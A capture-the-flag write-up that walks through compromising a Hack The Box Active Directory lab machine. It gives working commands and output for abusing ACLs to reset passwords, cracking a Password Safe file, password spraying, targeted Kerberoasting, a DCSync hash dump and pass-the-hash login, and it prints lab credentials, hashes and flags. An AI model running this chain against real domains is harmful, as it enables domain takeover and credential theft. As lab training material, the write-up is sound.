Administrator

AD box on HTB.

Enumeration:

Port Scanning:

As always we are going to start with nmap:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Administrator]                                                                                                                 
└─$ sudo nmap -sCV -p- --min-rate 4000 -oA nmap/services -vv 10.129.122.91
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-17 04:58 +03
Nmap scan report for 10.129.122.91
Host is up, received echo-reply ttl 127 (0.27s latency).
Scanned at 2025-09-17 04:58:39 +03 for 192s 
Not shown: 65509 closed tcp ports (reset)
PORT      STATE SERVICE       REASON          VERSION
21/tcp    open  ftp           syn-ack ttl 127 Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-09-17 08:59:14Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack ttl 127
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack ttl 127
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0 
|_http-title: Not Found
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
<snipped>
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

<snipped>
|_clock-skew: 7h00m04s

<snipped>

This time we have port 21 (FTP) open, and nmap could not authenticate as anonymous, because I did not see that in the result, which means we have to find valid username and password.

We will see the clock skew is too great, so I will sync the time with the target machine with nptdate for any further kerberos usage:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Administrator]
└─$ sudo ntpdate 10.129.122.91                                                        
2025-09-17 12:03:27.177419 (+0300) +25204.812522 +/- 0.086912 10.129.122.91 s1 no-leap 
CLOCK: time stepped by 25204.812522

Also lets get the domain name and the target machine name, and add it to the hosts file:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Administrator]                                                                                                                 
└─$ netexec smb 10.129.122.91                                                                                                                                               
SMB         10.129.122.91   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Administrator]                           
└─$ cat /etc/hosts                                                                                                                                                          
127.0.0.1       localhost                                                             
127.0.1.1       kali                                                                  
<snipped>                                                                                                                                       
                                                                                                                                                                            
10.129.122.91 DC.administrator.htb administrator.htb DC

We are provided with a username and password to emulate assumed breach scenrios in real world engagements: olivia:ichliebedich.

BloodHound:

As we have domain user, we can start by ingesting the data, and upload it to BloodHound, and I will ingest using both bloodhound-python, and rusthound-ce, because if one misses something the other completes it:

┌──(kali㉿kali)-[~/…/Machines/HackTheBox/Administrator/bloodhound]           
└─$ bloodhound-python -u olivia -p 'ichliebedich' -ns 10.129.122.91 -d administrator.htb -dc dc.administrator.htb -c all                                                    
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)                                                                                                          
INFO: Found AD domain: administrator.htb                                                                                                                                    
INFO: Getting TGT for user                                                                                                                                                  
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)                               
INFO: Connecting to LDAP server: dc.administrator.htb                                                                                                                       
INFO: Found 1 domains                                                                                                                                                       
INFO: Found 1 domains in the forest                                                                                                                                         
INFO: Found 1 computers                                                                                                                                                     INFO: Connecting to LDAP server: dc.administrator.htb                                                                                                                       
INFO: Found 11 users                                                                                                                                                        INFO: Found 53 groups                                                                                                                                                       
INFO: Found 2 gpos                                                                                                                                                          
INFO: Found 1 ous                                                                                                                                                           
INFO: Found 19 containers                                                                                                                                                   
INFO: Found 0 trusts                                                                                                                                                        
INFO: Starting computer enumeration with 10 workers                                                                                                                         
INFO: Querying computer: dc.administrator.htb                                                                                                                               
INFO: Done in 00M 38S

┌──(kali㉿kali)-[~/…/Machines/HackTheBox/Administrator/bloodhound]                                                                                          05:06:39 [64/86]
└─$ rusthound-ce -u olivia -p ichliebedich -d administrator.htb -f dc.administrator.htb -i 10.129.122.91 -n 10.129.122.91                                                   
---------------------------------------------------                                                                                                                         
Initializing RustHound-CE at 05:06:21 on 09/17/25                                                                                                                           
Powered by @g0h4n_0                                                                                                                                                         
---------------------------------------------------                                                                                                                         
                                                                                                                                                                            
[2025-09-17T02:06:21Z INFO  rusthound_ce] Verbosity level: Info                                                                                                             
[2025-09-17T02:06:21Z INFO  rusthound_ce] Collection method: All                                                                                                            
[2025-09-17T02:06:22Z INFO  rusthound_ce::ldap] Connected to ADMINISTRATOR.HTB Active Directory!                                                                            
[2025-09-17T02:06:22Z INFO  rusthound_ce::ldap] Starting data collection...                                                                                                 
[2025-09-17T02:06:22Z INFO  rusthound_ce::ldap] Ldap filter : (objectClass=*)                                                                                               
[2025-09-17T02:06:24Z INFO  rusthound_ce::ldap] All data collected for NamingContext DC=administrator,DC=htb                                                                
[2025-09-17T02:06:24Z INFO  rusthound_ce::ldap] Ldap filter : (objectClass=*)                                                                                               
[2025-09-17T02:06:33Z INFO  rusthound_ce::ldap] All data collected for NamingContext CN=Configuration,DC=administrator,DC=htb                                               [2025-09-17T02:06:33Z INFO  rusthound_ce::ldap] Ldap filter : (objectClass=*)                                                                                               
[2025-09-17T02:06:38Z INFO  rusthound_ce::ldap] All data collected for NamingContext CN=Schema,CN=Configuration,DC=administrator,DC=htb                                     
[2025-09-17T02:06:38Z INFO  rusthound_ce::ldap] Ldap filter : (objectClass=*)                                                                                               
[2025-09-17T02:06:39Z INFO  rusthound_ce::ldap] All data collected for NamingContext DC=DomainDnsZones,DC=administrator,DC=htb                                              
[2025-09-17T02:06:39Z INFO  rusthound_ce::ldap] Ldap filter : (objectClass=*)                                                                                               
[2025-09-17T02:06:39Z INFO  rusthound_ce::ldap] All data collected for NamingContext DC=ForestDnsZones,DC=administrator,DC=htb                                              
[2025-09-17T02:06:39Z INFO  rusthound_ce::api] Starting the LDAP objects parsing...
[2025-09-17T02:06:39Z INFO  rusthound_ce::objects::domain] MachineAccountQuota: 10
[2025-09-17T02:06:39Z INFO  rusthound_ce::api] Parsing LDAP objects finished!
[2025-09-17T02:06:39Z INFO  rusthound_ce::json::checker] Starting checker to replace some values...
[2025-09-17T02:06:39Z INFO  rusthound_ce::json::checker] Checking and replacing some values finished!
[2025-09-17T02:06:39Z INFO  rusthound_ce::json::maker::common] 11 users parsed!
[2025-09-17T02:06:39Z INFO  rusthound_ce::json::maker::common] .//20250917050639_administrator-htb_users.json created!
[2025-09-17T02:06:39Z INFO  rusthound_ce::json::maker::common] 61 groups parsed!
[2025-09-17T02:06:39Z INFO  rusthound_ce::json::maker::common] .//20250917050639_administrator-htb_groups.json created!
[2025-09-17T02:06:39Z INFO  rusthound_ce::json::maker::common] 1 computers parsed!
[2025-09-17T02:06:39Z INFO  rusthound_ce::json::maker::common] .//20250917050639_administrator-htb_computers.json created!
[2025-09-17T02:06:39Z INFO  rusthound_ce::json::maker::common] 1 ous parsed!
[2025-09-17T02:06:39Z INFO  rusthound_ce::json::maker::common] .//20250917050639_administrator-htb_ous.json created!
[2025-09-17T02:06:39Z INFO  rusthound_ce::json::maker::common] 3 domains parsed!
[2025-09-17T02:06:39Z INFO  rusthound_ce::json::maker::common] .//20250917050639_administrator-htb_domains.json created!
[2025-09-17T02:06:39Z INFO  rusthound_ce::json::maker::common] 2 gpos parsed!
[2025-09-17T02:06:39Z INFO  rusthound_ce::json::maker::common] .//20250917050639_administrator-htb_gpos.json created!
[2025-09-17T02:06:39Z INFO  rusthound_ce::json::maker::common] 73 containers parsed!
[2025-09-17T02:06:39Z INFO  rusthound_ce::json::maker::common] .//20250917050639_administrator-htb_containers.json created!

RustHound-CE Enumeration Completed at 05:06:39 on 09/17/25! Happy Graphing!

Start BloodHound, and upload the ingested data to it:

┌──(kali㉿kali)-[~/…/Machines/HackTheBox/Administrator/bloodhound]                                                                                          05:07:19 [20/86]
└─$ sudo bloodhound                
[sudo] password for kali: 

 Starting neo4j
Neo4j is not running.
<snipped>
......................................................
 Bloodhound will start

 IMPORTANT: It will take time, please wait...
 
<snipped>

 opening http://127.0.0.1:8080

Lateral Movememnt:

Mark olivia as owned, and check its outbound object control:

We have GenericAll ACL over michael user, which allows us to do various attacks, such as targetedkerberoast to add an SPN to the target user, and ask for his TGS, and then remove it, or we can perform shadow credentials to dump this user's ntlm hash, or simply what we can do is change this user's password.

I will use bloodyAD to do so:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Administrator]
└─$ bloodyAD --host 10.129.122.91 -d administrator.htb -u olivia -p 'ichliebedich' set password 'michael' 'Caesar3#'        
[+] Password changed successfully!

Confirm the password has been changed successfully:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Administrator]                                                                                                                 
└─$ netexec smb 10.129.122.91 -u michael -p 'Caesar3#'                                                                                                                      
SMB         10.129.122.91   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)               
SMB         10.129.122.91   445    DC               [+] administrator.htb\michael:Caesar3#

Move on to michael, and see his outband object control:

So we can change benjamin's password as well.

I will use the same approach:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Administrator]
└─$ bloodyAD --host 10.129.122.91 -d administrator.htb -u michael -p 'Caesar3#' set password 'benjamin' 'Caesar3#'
[+] Password changed successfully!

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Administrator]                                                                                                                 
└─$ netexec smb 10.129.122.91 -u benjamin -p 'Caesar3#'                                                                                                                     
SMB         10.129.122.91   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)               
SMB         10.129.122.91   445    DC               [+] administrator.htb\benjamin:Caesar3#

See this user's groups:

We are part of the share moderators, maybe we can do something with ftp since we are part of this group.

FTP Enumeration:

Try to access ftp with those credentials:

┌──(kali㉿kali)-[~/…/Machines/HackTheBox/Administrator/ftp]
└─$ ftp benjamin@10.129.122.91
Connected to 10.129.122.91.                                                           
220 Microsoft FTP Service                                                             
331 Password required                                                                                                                                                       
Password: Caesar3#            
230 User logged in.                                                                   
Remote system type is Windows_NT.                                                     
ftp>

We successfully managed to authenticate as we could not previously do.

Lets enumerate what files or folders there are:

ftp> ls                                                                               
229 Entering Extended Passive Mode (|||60739|)             
125 Data connection already open; Transfer starting.                                                                                                                        
10-05-24  09:13AM                  952 Backup.psafe3
226 Transfer complete.                                                                
ftp> get Backup.psafe3                    
local: Backup.psafe3 remote: Backup.psafe3
229 Entering Extended Passive Mode (|||60741|)                                        
125 Data connection already open; Transfer starting.                                  
100% |*******************************************************************************************************************************|   952        3.79 KiB/s    00:00 ETA
226 Transfer complete.                                                                
WARNING! 3 bare linefeeds received in ASCII mode.
File may not have transferred correctly.                                              
952 bytes received in 00:00 (2.51 KiB/s)                                              
ftp> exit                                  
221 Goodbye.

We will find Backup.psafe3 file, and I downloaded it with the ftp get built-in command.

This file is new to us, so we can do some searching to find what is it, and how we can interact or open it:

┌──(kali㉿kali)-[~/…/Machines/HackTheBox/Administrator/ftp]
└─$ file Backup.psafe3
Backup.psafe3: Password Safe V3 database

It is a database.

I searched a little bit and found this htlm web page that tells us about a tool called pwsafe:

Command Line Argumentspwsafe.org

And I have it installed on my kali VM.

Lets open that backup file:

┌──(kali㉿kali)-[~/…/Machines/HackTheBox/Administrator/ftp]                           
└─$ pwsafe Backup.psafe3

I tried multiple default passwords to access the database but could not, so we have to find a way to retrieve the master password.

Search a bit:

We will find that we have hashcat mode that can get the password, or with john using one of its tools pwsafe2john:

┌──(kali㉿kali)-[~/…/Machines/HackTheBox/Administrator/ftp]
└─$ pwsafe2john Backup.psafe3    
Backu:$pwsafe$*3*4ff588b74906263ad2abba592aba35d58bcd3a57e307bf79c8479dec6b3149aa*2048*1a941c10167252410ae04b7b43753aaedb4ec63e3f18c646bb084ec4f0944050

Now attempt to crack it:

┌──(kali㉿kali)-[~/…/Machines/HackTheBox/Administrator/ftp]
└─$ john Backup.psafe3.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (pwsafe, Password Safe [SHA256 256/256 AVX2 8x])
Cost 1 (iteration count) is 2048 for all loaded hashes
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
tekieromucho     (Backu)     
1g 0:00:00:00 DONE (2025-09-17 05:13) 5.263g/s 32336p/s 32336c/s 32336C/s 123456..iheartyou
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Here is the password.

Lateral Movement again to emily:

Lets open that database again by specifying that password as the master password:

We can copy the usernames and the passwords, and save them into a file to spray them:

Using netexec:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Administrator]                                                                                                                 
└─$ netexec smb 10.129.122.91 -u users.txt -p passwords.txt --continue-on-success                                                                                           
SMB         10.129.122.91   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)               
SMB         10.129.122.91   445    DC               [-] administrator.htb\alexander:UrkIbagoxMyUGw0aPlj9B0AXSea4Sw STATUS_LOGON_FAILURE                                     
SMB         10.129.122.91   445    DC               [-] administrator.htb\olivia:UrkIbagoxMyUGw0aPlj9B0AXSea4Sw STATUS_LOGON_FAILURE                                        
SMB         10.129.122.91   445    DC               [-] administrator.htb\michael:UrkIbagoxMyUGw0aPlj9B0AXSea4Sw STATUS_LOGON_FAILURE                                       
SMB         10.129.122.91   445    DC               [-] administrator.htb\benjamin:UrkIbagoxMyUGw0aPlj9B0AXSea4Sw STATUS_LOGON_FAILURE                                      
SMB         10.129.122.91   445    DC               [-] administrator.htb\emily:UrkIbagoxMyUGw0aPlj9B0AXSea4Sw STATUS_LOGON_FAILURE 
SMB         10.129.122.91   445    DC               [-] administrator.htb\emma:UrkIbagoxMyUGw0aPlj9B0AXSea4Sw STATUS_LOGON_FAILURE                                        
SMB         10.129.122.91   445    DC               [-] administrator.htb\administrator:UrkIbagoxMyUGw0aPlj9B0AXSea4Sw STATUS_LOGON_FAILURE                          
SMB         10.129.122.91   445    DC               [-] administrator.htb\ethan:UrkIbagoxMyUGw0aPlj9B0AXSea4Sw STATUS_LOGON_FAILURE                                    
SMB         10.129.122.91   445    DC               [-] administrator.htb\alexander:UXLCI5iETUsIBoFVTj8yQFKoHjXmb STATUS_LOGON_FAILURE                
SMB         10.129.122.91   445    DC               [-] administrator.htb\olivia:UXLCI5iETUsIBoFVTj8yQFKoHjXmb STATUS_LOGON_FAILURE        
SMB         10.129.122.91   445    DC               [-] administrator.htb\michael:UXLCI5iETUsIBoFVTj8yQFKoHjXmb STATUS_LOGON_FAILURE 
SMB         10.129.122.91   445    DC               [-] administrator.htb\benjamin:UXLCI5iETUsIBoFVTj8yQFKoHjXmb STATUS_LOGON_FAILURE   
SMB         10.129.122.91   445    DC               [+] administrator.htb\emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb                        
SMB         10.129.122.91   445    DC               [-] administrator.htb\emma:UXLCI5iETUsIBoFVTj8yQFKoHjXmb STATUS_LOGON_FAILURE     
SMB         10.129.122.91   445    DC               [-] administrator.htb\administrator:UXLCI5iETUsIBoFVTj8yQFKoHjXmb STATUS_LOGON_FAILURE 
SMB         10.129.122.91   445    DC               [-] administrator.htb\ethan:UXLCI5iETUsIBoFVTj8yQFKoHjXmb STATUS_LOGON_FAILURE 
SMB         10.129.122.91   445    DC               [-] administrator.htb\alexander:WwANQWnmJnGV07WQN8bMS7FMAbjNur STATUS_LOGON_FAILURE     
SMB         10.129.122.91   445    DC               [-] administrator.htb\olivia:WwANQWnmJnGV07WQN8bMS7FMAbjNur STATUS_LOGON_FAILURE 
SMB         10.129.122.91   445    DC               [-] administrator.htb\michael:WwANQWnmJnGV07WQN8bMS7FMAbjNur STATUS_LOGON_FAILURE 
SMB         10.129.122.91   445    DC               [-] administrator.htb\benjamin:WwANQWnmJnGV07WQN8bMS7FMAbjNur STATUS_LOGON_FAILURE 
SMB         10.129.122.91   445    DC               [-] administrator.htb\emma:WwANQWnmJnGV07WQN8bMS7FMAbjNur STATUS_LOGON_FAILURE 
SMB         10.129.122.91   445    DC               [-] administrator.htb\administrator:WwANQWnmJnGV07WQN8bMS7FMAbjNur STATUS_LOGON_FAILURE 
SMB         10.129.122.91   445    DC               [-] administrator.htb\ethan:WwANQWnmJnGV07WQN8bMS7FMAbjNur STATUS_LOGON_FAILURE

We find that only emily's password worked for emily's herself.

Check BloodHound again:

We have GenericWrite over ethan.

Domain Privilege Escalation:

This time I will perform targetedkerberoast attack using a tool called targetedkerberoast to set an SPN for ethan, and ask for his TGS, and then remove that SPN:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Administrator]                                                                                                                 
└─$ python3 /opt/Tools/targetedKerberoast/targetedKerberoast.py -v -d administrator.htb -u emily -p UXLCI5iETUsIBoFVTj8yQFKoHjXmb --request-user ethan
[*] Starting kerberoast attacks
[*] Attacking user (ethan)
[VERBOSE] SPN added successfully for (ethan)
[+] Printing hash for (ethan)
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$eec5d398cff7866a2e0b7541235bc728$e4e94cee759423a239a9e71309c9350b535d993694bc6ef62c7631bcf3d5bb40bf578f6bc7e41
77e5f23b40c5733d8edeefc3c3e94046516ca68c9b55520907603157b699c547f8f9083a5159142508b568451dd050f83b1eb85c8619bd23fd9e8674c21cb8ef9096fbeabcabac9a6f2759a7fb313041de0e253233ed
5831b179f6b1731f6d59560f9cd304ee720eab0a1bb23e92cfe0bb5d1bb8439512292ce7c80c1472cc4d75f31ec87084065f92437520873e4e4a1c7041c8fe6830b57d46451f190b141c3c0182dafb876918f654349f
b7ab1bfc5c633998c329fa267f59ab0ddbac5fbc7ca419df666db3d6be084bf238ca27168818b86de2d85bbfcbccd978c8b07f67e983c2c9931399637f59a64ce8250a3d12aa056e5146f6e54c96f2fa896e4f04a0c4
d923ec691574f4c26fac9dff3eb3a18518514a92c54d758a22ccc1eb52c064bc86b6240fd85e4a7dbd6e8b6eda7f11591c63063509efadec145e1acb84c6cf6cdbad21f2633105756a30e11c9993aee069b1fd4425d4
6b86f84ecd5e29c90f4ddbaa8f67d546e0761a2ef5b924d816a25b6b7afc2262aa0982abae273853a1144dfb9a71ac55da2402062f3b873475dc095fe2e59058949f9c705772d532745714db41095ffa180ecb8afd3e
1825b0d97f3967728e200bfc9f74ca4fa87386840e2bc4166bc2fec0a6965863d68ee334a264a8ea802c46726f9066c6fca13e71e111b18962c8e5736f584cc8fe51bff3ab79781f93604169677121427d69780a9d54
a33ba512edc170fd43bfbef9e2377fedc9b623dc98c3af37d419aed028fa7dc7c5b38fb89e667a503606ba627a02886434562304b2a73034dd0265f2efdc1798909d06d3774172ebc70221cfaffe89020d0dcf060f62
45c61c5d160f6fd546e91373fb38b8873d5430a1fbfdc21cd03e15e8ab445dc88caf8111d09c9e66c5dcd6ccb00f43bdf90e8a428444979988b1cc92a7a874b82aaf848552969d9beae8c8d3bfe0c21c505578c0aac2
e725fb9fbd45dbc46f960d4e69407903dcc49da09c96c23d7a4e2c44f8cfb2107163007c72bdd2856aa7b66d1cbb69dcbbd0babf4231b5b514f43794d5089462fe8fa601d2f8f7855e472fa104e10cde50b2ecebedfd
cdeb3867b3ba7f75f0b4e054ec20d11f84b822be70c67c58fb68f3e762e6826cbf9eda460940d3f37b9ac0e01f82d8f7d4fabe6c34f4e6b63146c02b25a108fd6dbf2f3f70c096dd359b4022d2d258ad589de144e0e6
de7014dcdc41cf756b5196d5f4ac093d6238eafa227d4a8912b91ad030eae94b6fe95d5b412e9ba2399347aec6d644a642e90970a41a99dd61f4d2c8e7a018b90bc3944033ceb37796425a01e1a9a65fc41d5e68315a
bdcecdf39e6efdc0181c3fc1c74e0f06fdf7f4f692dacdf9572fb38f4bff1719bcc12fce1f8a8fe8aad8ca1a4a28e72028155c98aa52a04b5fec64b26e3b80cc80cdda19d416f923ea3c90b4deafe3a14734b65ed6cb
3223d079729006892b2b80f460fc64150
[VERBOSE] SPN removed successfully for (ethan)

Attempt to crack his hash with hashcat:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Administrator]
└─$ hashcat ethan.hash /usr/share/wordlists/rockyou.txt                                                                                               
hashcat (v6.2.6) starting in autodetect mode

<snipped>

$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$eec5d398cff7866a2e0b7541235bc728$e4e94cee759423a239a9e71309c9350b535d993694bc6ef62c7631bcf3d5bb40bf578f6bc7e41
77e5f23b40c5733d8edeefc3c3e94046516ca68c9b55520907603157b699c547f8f9083a5159142508b568451dd050f83b1eb85c8619bd23fd9e8674c21cb8ef9096fbeabcabac9a6f2759a7fb313041de0e253233ed
5831b179f6b1731f6d59560f9cd304ee720eab0a1bb23e92cfe0bb5d1bb8439512292ce7c80c1472cc4d75f31ec87084065f92437520873e4e4a1c7041c8fe6830b57d46451f190b141c3c0182dafb876918f654349f
b7ab1bfc5c633998c329fa267f59ab0ddbac5fbc7ca419df666db3d6be084bf238ca27168818b86de2d85bbfcbccd978c8b07f67e983c2c9931399637f59a64ce8250a3d12aa056e5146f6e54c96f2fa896e4f04a0c4
d923ec691574f4c26fac9dff3eb3a18518514a92c54d758a22ccc1eb52c064bc86b6240fd85e4a7dbd6e8b6eda7f11591c63063509efadec145e1acb84c6cf6cdbad21f2633105756a30e11c9993aee069b1fd4425d4
6b86f84ecd5e29c90f4ddbaa8f67d546e0761a2ef5b924d816a25b6b7afc2262aa0982abae273853a1144dfb9a71ac55da2402062f3b873475dc095fe2e59058949f9c705772d532745714db41095ffa180ecb8afd3e
1825b0d97f3967728e200bfc9f74ca4fa87386840e2bc4166bc2fec0a6965863d68ee334a264a8ea802c46726f9066c6fca13e71e111b18962c8e5736f584cc8fe51bff3ab79781f93604169677121427d69780a9d54
a33ba512edc170fd43bfbef9e2377fedc9b623dc98c3af37d419aed028fa7dc7c5b38fb89e667a503606ba627a02886434562304b2a73034dd0265f2efdc1798909d06d3774172ebc70221cfaffe89020d0dcf060f62
45c61c5d160f6fd546e91373fb38b8873d5430a1fbfdc21cd03e15e8ab445dc88caf8111d09c9e66c5dcd6ccb00f43bdf90e8a428444979988b1cc92a7a874b82aaf848552969d9beae8c8d3bfe0c21c505578c0aac2
e725fb9fbd45dbc46f960d4e69407903dcc49da09c96c23d7a4e2c44f8cfb2107163007c72bdd2856aa7b66d1cbb69dcbbd0babf4231b5b514f43794d5089462fe8fa601d2f8f7855e472fa104e10cde50b2ecebedfd
cdeb3867b3ba7f75f0b4e054ec20d11f84b822be70c67c58fb68f3e762e6826cbf9eda460940d3f37b9ac0e01f82d8f7d4fabe6c34f4e6b63146c02b25a108fd6dbf2f3f70c096dd359b4022d2d258ad589de144e0e6
de7014dcdc41cf756b5196d5f4ac093d6238eafa227d4a8912b91ad030eae94b6fe95d5b412e9ba2399347aec6d644a642e90970a41a99dd61f4d2c8e7a018b90bc3944033ceb37796425a01e1a9a65fc41d5e68315a
bdcecdf39e6efdc0181c3fc1c74e0f06fdf7f4f692dacdf9572fb38f4bff1719bcc12fce1f8a8fe8aad8ca1a4a28e72028155c98aa52a04b5fec64b26e3b80cc80cdda19d416f923ea3c90b4deafe3a14734b65ed6cb
3223d079729006892b2b80f460fc64150:limpbizkit
                                                           
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator....c64150
Time.Started.....: Wed Sep 17 05:19:39 2025 (0 secs)
Time.Estimated...: Wed Sep 17 05:19:39 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   716.5 kH/s (1.21ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 6144/14344385 (0.04%)
Rejected.........: 0/6144 (0.00%)
Restore.Point....: 3072/14344385 (0.02%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: adriano -> iheartyou
Hardware.Mon.#1..: Util: 14%

<snipped>

And finally, check ethan's ACLs over other objects:

So ehtan's has replication rights over the domain, so we can perform DCSync on the domain, I will use impacket-secretsdump to do that:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Administrator]
└─$ impacket-secretsdump administrator.htb/ethan:limpbizkit@10.129.122.91         
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e:::
<snipped>
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:9d453509ca9b7bec02ea8c2161d2d340fd94bf30cc7e52cb94853a04e9e69664
Administrator:aes128-cts-hmac-sha1-96:08b0633a8dd5f1d6cbea29014caea5a2
Administrator:des-cbc-md5:403286f7cdf18385
<snipped>
[*] Cleaning up...

Lets authenticate with the domain administrator ntlm hash:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Administrator]
└─$ evil-winrm -i 10.129.122.91 -u administrator -H 3dc553ce4b9fd20bd016e098d2d2fd2e
                                         
Evil-WinRM shell v3.7
                                         
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                         
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                         
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
administrator\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> hostname
dc
*Evil-WinRM* PS C:\Users\Administrator\Documents> ipconfig

Windows IP Configuration


Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : .htb 
   IPv4 Address. . . . . . . . . . . : 10.129.122.91
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : 10.129.0.1

Get the flags:

*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:\Users\Administrator\Desktop\root.txt
060967316fa6601108f77a70fed17970
*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:\Users\emily\Desktop\user.txt 
606f19540bf4f9b1365f182dd36185cb
*Evil-WinRM* PS C:\Users\Administrator\Documents>

PreviousEscape NextCertified

Last updated 4 months ago

hashtagEnumeration:

hashtagPort Scanning:

hashtagBloodHound:

hashtagLateral Movememnt:

hashtagFTP Enumeration:

hashtagLateral Movement again to emily:

hashtagDomain Privilege Escalation: